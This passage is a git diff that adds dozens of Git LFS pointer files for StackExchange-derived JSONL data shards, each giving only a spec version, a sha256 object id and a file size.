new file mode 100644 index 0000000000000000000000000000000000000000..96b7b71791947676752123550599c9405432b61c --- /dev/null +++ b/data/stackexchange/1-1/244_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a74c401cb5a3bdc03ccade0fa45cd84bbbe626d94afd03b473bf7dbb7a99bd42 +size 37919096 diff --git a/data/stackexchange/1-1/245_2289.jsonl b/data/stackexchange/1-1/245_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dd808a2e703ee095b8321550e14eaa920882e7da --- /dev/null +++ b/data/stackexchange/1-1/245_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9320285d728496c6d7b644128092bcb9f94ee953e545c292d3fefaa7d4d3f7a9 +size 37745743 diff --git a/data/stackexchange/1-1/246_2289.jsonl b/data/stackexchange/1-1/246_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7a2a33a0de7080947180de5ffb9e6895fb884680 --- /dev/null +++ b/data/stackexchange/1-1/246_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8582426f4cd35af393da40108d59b7f74b4d9a82c0e2ec09ca589e28c08bebfa +size 37775474 diff --git a/data/stackexchange/1-1/247_2289.jsonl b/data/stackexchange/1-1/247_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c75018b31b840bef16e8b705b64dc79e7637506e --- /dev/null +++ b/data/stackexchange/1-1/247_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1e74e42cc1eb44b38eb6ab24163f73f8d3aad57a531cce2225d0f74b691c28b5 +size 38107747 diff --git a/data/stackexchange/1-1/248_2289.jsonl b/data/stackexchange/1-1/248_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e9140dad2bcf5872b4f91adc4135d0073a544b12 --- /dev/null +++ b/data/stackexchange/1-1/248_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a69ea8cefe6b4c9fba28cface558b4167576f93060e665940ae34997d7387b18 +size 38706368 diff --git a/data/stackexchange/1-1/249_2289.jsonl b/data/stackexchange/1-1/249_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f00bd0919b6fa5571940f9200c12cbbce2034f4a --- /dev/null +++ b/data/stackexchange/1-1/249_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a22a5d88c55fe6eaeaa82a3e0373b88a7e7bc52bf12eb0147a110a06dde29a82 +size 38353158 diff --git a/data/stackexchange/1-1/24_2289.jsonl b/data/stackexchange/1-1/24_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..874d45624c9b8ae339399cbdb4489c554c8dad92 --- /dev/null +++ b/data/stackexchange/1-1/24_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fa5fbe70d3c38a6abe8ff5f94ed66f79636988a76a5258400364837297aac537 +size 35446976 diff --git a/data/stackexchange/1-1/250_2289.jsonl b/data/stackexchange/1-1/250_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..191c2503a035bb620c8c557b96487519286b41f5 --- /dev/null +++ b/data/stackexchange/1-1/250_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fc6887a8d5c0f577a61ad660880e295259ccd69009278b58a8816c32d75f159 +size 35350670 diff --git a/data/stackexchange/1-1/251_2289.jsonl b/data/stackexchange/1-1/251_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6ca19da1a90dc4c435879c45df407dda50cbfe6f --- /dev/null +++ b/data/stackexchange/1-1/251_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ffe991cada9523ae906c230fe684a5a7ff89d9f1d0d01670ed63357c7b1e318 +size 35442791 diff --git a/data/stackexchange/1-1/252_2289.jsonl b/data/stackexchange/1-1/252_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b31f4cafd2805bbe7eec79b710465eac3d7c4ae --- /dev/null +++ b/data/stackexchange/1-1/252_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67fa632eeebd99d1e1df57d140581f65579e2c1b445bb1761fbf19767d0ef962 +size 35013691 diff --git a/data/stackexchange/1-1/253_2289.jsonl b/data/stackexchange/1-1/253_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9adca29992a203f410495e6939509bab91e110a5 --- /dev/null +++ b/data/stackexchange/1-1/253_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:34a4afe27f79f133551d1b0d27a5396842bed32b9e69f0b2bae4085b5cc833a1 +size 34812005 diff --git a/data/stackexchange/1-1/254_2289.jsonl b/data/stackexchange/1-1/254_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b720eb155b83cb28fca9fcee9037e9c82141d350 --- /dev/null +++ b/data/stackexchange/1-1/254_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f5b9d23fb3abc823db3a5b7315e34f53274fbc47ffca4bedfe5956872944a69f +size 35262484 diff --git a/data/stackexchange/1-1/255_2289.jsonl b/data/stackexchange/1-1/255_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fb591a3a25bd6eb61f1ed1ecfe64c70aa7f92c31 --- /dev/null +++ b/data/stackexchange/1-1/255_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f9dec9a0a982679a578f1b86f59224ba89c17702c1eb55dd8950aa9465518852 +size 35747214 diff --git a/data/stackexchange/1-1/256_2289.jsonl b/data/stackexchange/1-1/256_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a5e9fbbe41f16ea7d294eb51230bf53e8c2e8b27 --- /dev/null +++ b/data/stackexchange/1-1/256_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8bdfd0f44156e3cba80a7b4dd2c352ecd9eb8ca64c1b4a05d375bf11cb67afa +size 35337939 diff --git a/data/stackexchange/1-1/257_2289.jsonl b/data/stackexchange/1-1/257_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a79bfce097603ae36948aae8ef3bf9b855da3ede --- /dev/null +++ b/data/stackexchange/1-1/257_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ae7000c3a6f18dc83732fd500590e01c68cad68e0c71bb4372395ed105bf0d9d +size 35156036 diff --git a/data/stackexchange/1-1/258_2289.jsonl b/data/stackexchange/1-1/258_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e2f8eb797c8603d0c728e28d58a0da2c7409ea29 --- /dev/null +++ b/data/stackexchange/1-1/258_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e17de04777c86b97377b46a80124e2689407bc9f263c53e95d9dc1b42c4d54d7 +size 35303981 diff --git a/data/stackexchange/1-1/259_2289.jsonl b/data/stackexchange/1-1/259_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4f9669992fb990134b80894f87eeb5f25e7994ab --- /dev/null +++ b/data/stackexchange/1-1/259_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b50317b0770a6dfe69e4a9ceda67ce4864d4a4968b1cdb5f1a8d2667a853992e +size 34492282 diff --git a/data/stackexchange/1-1/25_2289.jsonl b/data/stackexchange/1-1/25_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e6c7a8040ff52ad1596c2e1f1f4be36f49aa2f4c --- /dev/null +++ b/data/stackexchange/1-1/25_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1247ed377bf291a2f06c1fe4d552aeb3f328908710a7f2c482a1b91302389dcf +size 35928223 diff --git a/data/stackexchange/1-1/260_2289.jsonl b/data/stackexchange/1-1/260_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02619e39c6b779c6408a67ac5571fcb9a3dba125 --- /dev/null +++ b/data/stackexchange/1-1/260_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d48cd05c69e9d7617e9eaa533f301df7ca04523dcd5779bceca1c4d02776beee +size 35272838 diff --git a/data/stackexchange/1-1/261_2289.jsonl b/data/stackexchange/1-1/261_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0e406dfeecc915666e919637debb88667e770b06 --- /dev/null +++ b/data/stackexchange/1-1/261_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0cdee776c116401bdf6b3a01f63a0cbcc8e693b269467930b0314419c81244b5 +size 35237996 diff --git a/data/stackexchange/1-1/262_2289.jsonl b/data/stackexchange/1-1/262_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..320c9902cf23fda735d47cf57d0752c472ff9649 --- /dev/null +++ b/data/stackexchange/1-1/262_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ffa3805511ac450e6a0d928ab7f0bb8b04ec68a437a50760398af36bb4fa8e8c +size 35024468 diff --git a/data/stackexchange/1-1/263_2289.jsonl b/data/stackexchange/1-1/263_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..28521a84c818337d89e5f3af705b01122a7533cc --- /dev/null +++ b/data/stackexchange/1-1/263_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64f88c2d7f16801271a1fafaf7355fe1bafa6aa7456c815ce0f48ffb4dc8a02b +size 34733799 diff --git a/data/stackexchange/1-1/264_2289.jsonl b/data/stackexchange/1-1/264_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1742cbf2770186b91b7b7e2a824ce240a3ca1c8 --- /dev/null +++ b/data/stackexchange/1-1/264_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eed6fb58ace5713dda366059020b200c3800dd0f53bd0647755f89239628d431 +size 35261980 diff --git a/data/stackexchange/1-1/265_2289.jsonl b/data/stackexchange/1-1/265_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4e5792ff6d206a1d1316a764dea0e712ae48996c --- /dev/null +++ b/data/stackexchange/1-1/265_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ad9b14f4f3717da096e1872a4656d9aa45f2a2eb77ad3ff35fcc1c50b845a4c +size 35370619 diff --git a/data/stackexchange/1-1/266_2289.jsonl b/data/stackexchange/1-1/266_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7120dc4c5fff0fff170cf77f796402abcfd45b54 --- /dev/null +++ b/data/stackexchange/1-1/266_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8d9ee0051d2ebf12a27a2ef879e721b7b98622593cdf9005a90de79ff05091f +size 35062276 diff --git a/data/stackexchange/1-1/267_2289.jsonl b/data/stackexchange/1-1/267_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa71add5d6557c70a33a6dcd7e43b6dde11b6bbf --- /dev/null +++ b/data/stackexchange/1-1/267_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:405908fd5e773ca8d34e2fc08bc450dc39cda180afd7fc895ad8f28c58197844 +size 35490107 diff --git a/data/stackexchange/1-1/268_2289.jsonl b/data/stackexchange/1-1/268_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fe59e70ed6956eeb1d3994b50bd39d59a3879dcd --- /dev/null +++ b/data/stackexchange/1-1/268_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9d8d70e884fb573503c1154c56c5fb10c6164afcbe0741161de05ecc996e8a6 +size 35110071 diff --git a/data/stackexchange/1-1/269_2289.jsonl b/data/stackexchange/1-1/269_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7e5b23d9ae1c839007353fe7b4927be4eb45c528 --- /dev/null +++ b/data/stackexchange/1-1/269_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:898e6f13a36986cf488b163ac380538416f1c35d0dbc2962ac48015cd6b43997 +size 35434011 diff --git a/data/stackexchange/1-1/26_2289.jsonl b/data/stackexchange/1-1/26_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..983c6887729391dd2407916d611f9e3978917430 --- /dev/null +++ b/data/stackexchange/1-1/26_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dbc6e81214c00423e50d5bf4594479bb85efb563f316732fc4ecca3d708bc963 +size 36224413 diff --git a/data/stackexchange/1-1/270_2289.jsonl b/data/stackexchange/1-1/270_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5d6525a808bdfe3f3b341a49339cae4f384c78e0 --- /dev/null +++ b/data/stackexchange/1-1/270_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9ed6a4a49ad21fcfecbef0a2b512394ba8f31cecd74ab9622d4d5e86bf05ca4 +size 34640570 diff --git a/data/stackexchange/1-1/271_2289.jsonl b/data/stackexchange/1-1/271_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..43ad53485a830fe5bbac7eca8f441b47847b083b --- /dev/null +++ b/data/stackexchange/1-1/271_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0a388278fc7322718fc7292be4cc692140a36b6e9bc9ee8d723327279d3975c +size 35398158 diff --git a/data/stackexchange/1-1/272_2289.jsonl b/data/stackexchange/1-1/272_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..780b407c538c3fbf7d8efbc0d0638a4baeb12d8a --- /dev/null +++ b/data/stackexchange/1-1/272_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e22b1238686eb08c1fd4d28eee8cc590ac8b0fc993480c2a3bbfe8cbf0e8cfae +size 35254737 diff --git a/data/stackexchange/1-1/273_2289.jsonl b/data/stackexchange/1-1/273_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..60e7660a0086429749e8e23438a5c4a228c6cc2d --- /dev/null +++ b/data/stackexchange/1-1/273_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dc8daab4df271b6cd66d4a7fb7276cfafaeaab28de3d595777ef0f699a24f2ab +size 34941120 diff --git a/data/stackexchange/1-1/274_2289.jsonl b/data/stackexchange/1-1/274_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fad749c6a8c5a331f878e3f3d4a7c1c1efa8e931 --- /dev/null +++ b/data/stackexchange/1-1/274_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30bc7f75444d055364f556572c3e08796cc4a03bf41c44b0ec7adb3ee059be85 +size 35367380 diff --git a/data/stackexchange/1-1/275_2289.jsonl b/data/stackexchange/1-1/275_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..441b14ace7babdb523ce93234dbcf310f18777ad --- /dev/null +++ b/data/stackexchange/1-1/275_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:663455fc303534eead0a42e789f8789c949217fbeb7434649a745f596a77061e +size 35400789 diff --git a/data/stackexchange/1-1/276_2289.jsonl b/data/stackexchange/1-1/276_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4039184384ff3386a3b2c7ed4841c37bc67a8f2c --- /dev/null +++ b/data/stackexchange/1-1/276_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a3ee9c2b8d3b8edd400b644667bff89985c8920c52336d49f9283336d5042ba +size 34933981 diff --git a/data/stackexchange/1-1/277_2289.jsonl b/data/stackexchange/1-1/277_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c3999ddc638ad41feafecb296ffe17d96bbd9a6 --- /dev/null +++ b/data/stackexchange/1-1/277_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:21c9becedb790df37b60390296a325ecc553c58de7d0f92e142283bc3200c40a +size 35685851 diff --git a/data/stackexchange/1-1/278_2289.jsonl b/data/stackexchange/1-1/278_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cb282920cb424265d378d8e8511b6a0348760000 --- /dev/null +++ b/data/stackexchange/1-1/278_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:994d62fa21e0874526ab80f4a8ef96409fe1c769abc755decb15829146d9fc66 +size 35497160 diff --git a/data/stackexchange/1-1/279_2289.jsonl b/data/stackexchange/1-1/279_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f373521a63efb481a363e1529ce75877c3fce612 --- /dev/null +++ b/data/stackexchange/1-1/279_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f82535f96e915954eabb0115caa0e47690f8e5234c9a58b486935b2108206e1 +size 34969901 diff --git a/data/stackexchange/1-1/27_2289.jsonl b/data/stackexchange/1-1/27_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96dd362dfeaa68d4a77ca37e54f8940cf9c489ab --- /dev/null +++ b/data/stackexchange/1-1/27_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee38116e0269fb4310557abcde00f7853fe144a495bb523cd7024c86e8eecaa9 +size 36164165 diff --git a/data/stackexchange/1-1/280_2289.jsonl b/data/stackexchange/1-1/280_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..39e4b854bb1b9902d9515499593c8ed955d940d5 --- /dev/null +++ b/data/stackexchange/1-1/280_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:86e6ee833bd366e8396ae76de64aa6eac51c389899797926d16a7a33e5fa514a +size 35347384 diff --git a/data/stackexchange/1-1/281_2289.jsonl b/data/stackexchange/1-1/281_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e439164f6f5741c2a6283897f2c6746ca3dde80 --- /dev/null +++ b/data/stackexchange/1-1/281_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8db4f979a02acdd2cae8baab1d878a35b64b3e79563435264744cbb2f58c8435 +size 35115379 diff --git a/data/stackexchange/1-1/282_2289.jsonl b/data/stackexchange/1-1/282_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1c58a5e4c95d3bda86bc0f54a6a4439624b0004 --- /dev/null +++ b/data/stackexchange/1-1/282_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:259f2a971ad636e40db50fc9f5a21f4e8922ff5729206ee3afb323178c0143fc +size 35735641 diff --git a/data/stackexchange/1-1/283_2289.jsonl b/data/stackexchange/1-1/283_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8f719f60f1e31343f9b4f8dd203885b437a22680 --- /dev/null +++ b/data/stackexchange/1-1/283_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:49abcae5a8b95022c99519fe0313b1281ff6734bb7657e5608aea9e96d4ed992 +size 34735074 diff --git a/data/stackexchange/1-1/284_2289.jsonl b/data/stackexchange/1-1/284_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b52f6d450962f955b3d3a4a8f64f2d1a0bd9952a --- /dev/null +++ b/data/stackexchange/1-1/284_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:300452266cc326697ee7a5996a4f1dd36e08ba1c4bf58be977f8132052b6125f +size 35675773 diff --git a/data/stackexchange/1-1/285_2289.jsonl b/data/stackexchange/1-1/285_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3b162c890043cd5b810f07d19358c91d21daed8e --- /dev/null +++ b/data/stackexchange/1-1/285_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fde1d825cdccde516c113f906eff6c516cde4ec0256ff242d9a0b524f8add9d8 +size 35071435 diff --git a/data/stackexchange/1-1/286_2289.jsonl b/data/stackexchange/1-1/286_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3fcba0fd1fb4c5796f4ec2c896a542c0591c295 --- /dev/null +++ b/data/stackexchange/1-1/286_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6f773ba7b2bc4421fb85d3d15d25badb8886add7527382f2c4592e625ebabc37 +size 35147812 diff --git a/data/stackexchange/1-1/287_2289.jsonl b/data/stackexchange/1-1/287_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..147163baf22bc0bca6958b4c555e9a5896ea18c7 --- /dev/null +++ b/data/stackexchange/1-1/287_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e740325d15341750f47dacc984b7cd9fb7040333ad6340e07378427377e293a0 +size 35490437 diff --git a/data/stackexchange/1-1/288_2289.jsonl b/data/stackexchange/1-1/288_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d88ca6dec38fcb79f6cccdbdd5ab0847ced79b0 --- /dev/null +++ b/data/stackexchange/1-1/288_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b87d8d2eb5a6d67a888403b81faaac279928700e37a5d0928414a4d63f99f043 +size 35512946 diff --git a/data/stackexchange/1-1/289_2289.jsonl b/data/stackexchange/1-1/289_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02c0407fb4b3e656a9fb6706a208fd787399dc62 --- /dev/null +++ b/data/stackexchange/1-1/289_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d970f54057dc60c11220de073011cdd0d60ee4a9db3433cddbbc144b4c0e2b77 +size 35614267 diff --git a/data/stackexchange/1-1/28_2289.jsonl b/data/stackexchange/1-1/28_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cbbc0c1e4353a8311a1e6359918c53f5172de32a --- /dev/null +++ b/data/stackexchange/1-1/28_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aff8275fa6562979825b2b67694d8f10c1db194ff1d8cd1f907a549cdc518f02 +size 35846513 diff --git a/data/stackexchange/1-1/290_2289.jsonl b/data/stackexchange/1-1/290_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..37a2d9acac1295f647bd507581946c559726c73e --- /dev/null +++ b/data/stackexchange/1-1/290_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95836b95a6d3a82802a3f1c9501c6e00892abede37259af0e2144a085b897d6f +size 35924505 diff --git a/data/stackexchange/1-1/291_2289.jsonl b/data/stackexchange/1-1/291_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a85a836d9fdf54605571b44f5876e8bd03b59be6 --- /dev/null +++ b/data/stackexchange/1-1/291_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0de0071dadc0e359b0aef43c6673f2ff5d20bbba81428a835ff420148880ed7c +size 35257511 diff --git a/data/stackexchange/1-1/292_2289.jsonl b/data/stackexchange/1-1/292_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e4253a08fb8e551d9d1915bed5f6f33946ac9cf3 --- /dev/null +++ b/data/stackexchange/1-1/292_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:beaa90dd99645839359aefae5847063bd50ac1760a9c08c4c2c2f6f0adca1072 +size 35685761 diff --git a/data/stackexchange/1-1/293_2289.jsonl b/data/stackexchange/1-1/293_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8a171b70fb96c9a29c9225521d69b41cef0fe85f --- /dev/null +++ b/data/stackexchange/1-1/293_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:733b1e6c30a2fb50b805e90526bcea334d11dd3789f7f90a5131e5686d7f2ff1 +size 34959118 diff --git a/data/stackexchange/1-1/294_2289.jsonl b/data/stackexchange/1-1/294_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..38fc4ac9769129dc8b51c1b00df5abbc94f0a0cb --- /dev/null +++ b/data/stackexchange/1-1/294_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0977ae53a123d316b120e8ce2ee97aece696e6f6383ddcfc7f97e96ef3b54d14 +size 35468208 diff --git a/data/stackexchange/1-1/295_2289.jsonl b/data/stackexchange/1-1/295_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec819eb29a139f5c3d747ee9b87aa77e1ca299cf --- /dev/null +++ b/data/stackexchange/1-1/295_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:897ac12303bb0bd9fe50a9135d2eec4bf6f1d4ac0754826d3a532f0669288386 +size 34976707 diff --git a/data/stackexchange/1-1/296_2289.jsonl b/data/stackexchange/1-1/296_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b41c293f9a5e14a92ce808a9947913266b49450 --- /dev/null +++ b/data/stackexchange/1-1/296_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:27b1f2052f3d76b9c48901fea1835e82f60bf0c210ade8ea021ad6c138c6b847 +size 35125933 diff --git a/data/stackexchange/1-1/297_2289.jsonl b/data/stackexchange/1-1/297_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f201ceeb33cd5d47719a9f41d0222dc32b29793f --- /dev/null +++ b/data/stackexchange/1-1/297_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3c8e5632392ebee4d623377366a3bfb553e63d812495d01e54555afe78580cb8 +size 35380971 diff --git a/data/stackexchange/1-1/298_2289.jsonl b/data/stackexchange/1-1/298_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7d6b6cd9f8a192eb19ae28a3b3c082eaf3d0b9f7 --- /dev/null +++ b/data/stackexchange/1-1/298_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:baaeb180390039fd18f35f19509e2abd86f8077cc830f0e84ea8bc922863868e +size 35018160 diff --git a/data/stackexchange/1-1/299_2289.jsonl b/data/stackexchange/1-1/299_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..229144dd0d699ea46d0146bbc17221aa5347dab8 --- /dev/null +++ b/data/stackexchange/1-1/299_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c97d1bc1eca3046f3f91f99ff3ec7eb475959b7cb4a5a0bf278597543f4d2bfd +size 35105850 diff --git a/data/stackexchange/1-1/29_2289.jsonl b/data/stackexchange/1-1/29_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ee4f7426d0b3d6071ca91887f5f919059b398b3 --- /dev/null +++ b/data/stackexchange/1-1/29_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1a963ba2a7bcff73e3bdb85d95d098d1623911995319c957769cfa8dc0019b5 +size 35315925 diff --git a/data/stackexchange/1-1/2_2289.jsonl b/data/stackexchange/1-1/2_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..53f4d8679e513ba2863a0c8a44a106f271d12fd9 --- /dev/null +++ b/data/stackexchange/1-1/2_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2c15280510c656ab2af5e5fa94437a8c09298ce9db28d06773e5a614258ef81 +size 35794513 diff --git a/data/stackexchange/1-1/300_2289.jsonl b/data/stackexchange/1-1/300_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f80a63583f33743f0fb1039012b6ca859f3b7560 --- /dev/null +++ b/data/stackexchange/1-1/300_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:75881533085deab8ddf69c0e8b4ef6fa13cbfc4705df7d3bfc879308c5f4c563 +size 39065119 diff --git a/data/stackexchange/1-1/301_2289.jsonl b/data/stackexchange/1-1/301_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b1fe435d89dbdbc720202434c6a6bb9c7617665c --- /dev/null +++ b/data/stackexchange/1-1/301_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2fbd77d5d90277aa3fe3d8868092591004afa0d51c6f56ce0580b8139157dde8 +size 38351770 diff --git a/data/stackexchange/1-1/302_2289.jsonl b/data/stackexchange/1-1/302_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..435c021dfcff5242b8b0cbef29633e21860ba394 --- /dev/null +++ b/data/stackexchange/1-1/302_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f2ff571fea0675bfe40b4bf58871a7a5f9ee6adc0dcb5009d1e7e80add5c0aeb +size 39173010 diff --git a/data/stackexchange/1-1/303_2289.jsonl 